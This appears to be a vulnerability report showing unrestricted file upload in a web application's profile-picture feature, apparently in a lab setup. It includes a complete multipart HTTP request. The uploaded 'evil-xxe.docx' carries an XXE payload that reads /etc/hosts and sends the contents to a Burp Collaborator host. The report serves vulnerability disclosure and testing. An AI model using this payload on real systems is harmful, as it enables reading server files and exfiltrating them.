Insecure File Upload #4
Description
Steps to reproduce:
- Login as any user
- Upload a new profile picture
- Upload any file type
I was able to upload docx, svg, xml, html, jsp etc
Attack Request:
POST /image HTTP/1.1
Host: 192.168.99.100:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------264311999222285
Content-Length: 827
Referer: https://192.168.99.100:8443/settings?id=1002
Cookie: JSESSIONID=D997F0ADEA6C0E4E5445D957349C22F0
Connection: close
Upgrade-Insecure-Requests: 1
-----------------------------264311999222285
Content-Disposition: form-data; name="creator_id"
1002
-----------------------------264311999222285
Content-Disposition: form-data; name="owner_id"
1002
-----------------------------264311999222285
Content-Disposition: form-data; name="label"
Profile Picture
-----------------------------264311999222285
Content-Disposition: form-data; name="context"
profile
-----------------------------264311999222285
Content-Disposition: form-data; name="file"; filename="evil-xxe.docx"
Content-Type: application/vnd.openxmlformats-officedocument.wordprocessingml.document
<!ENTITY % data SYSTEM "file:///etc/hosts"><!ENTITY % param1 "<!ENTITY exfil SYSTEM 'yy08gndcee5xrh6ws928gj4qlhr7fw.burpcollaborator.net?%data;'>">
-----------------------------264311999222285--
Attack response:
HTTP/1.1 302
Location: settings?id=1002
Content-Length: 0
Date: Thu, 26 Oct 2017 15:49:25 GMT
Connection: close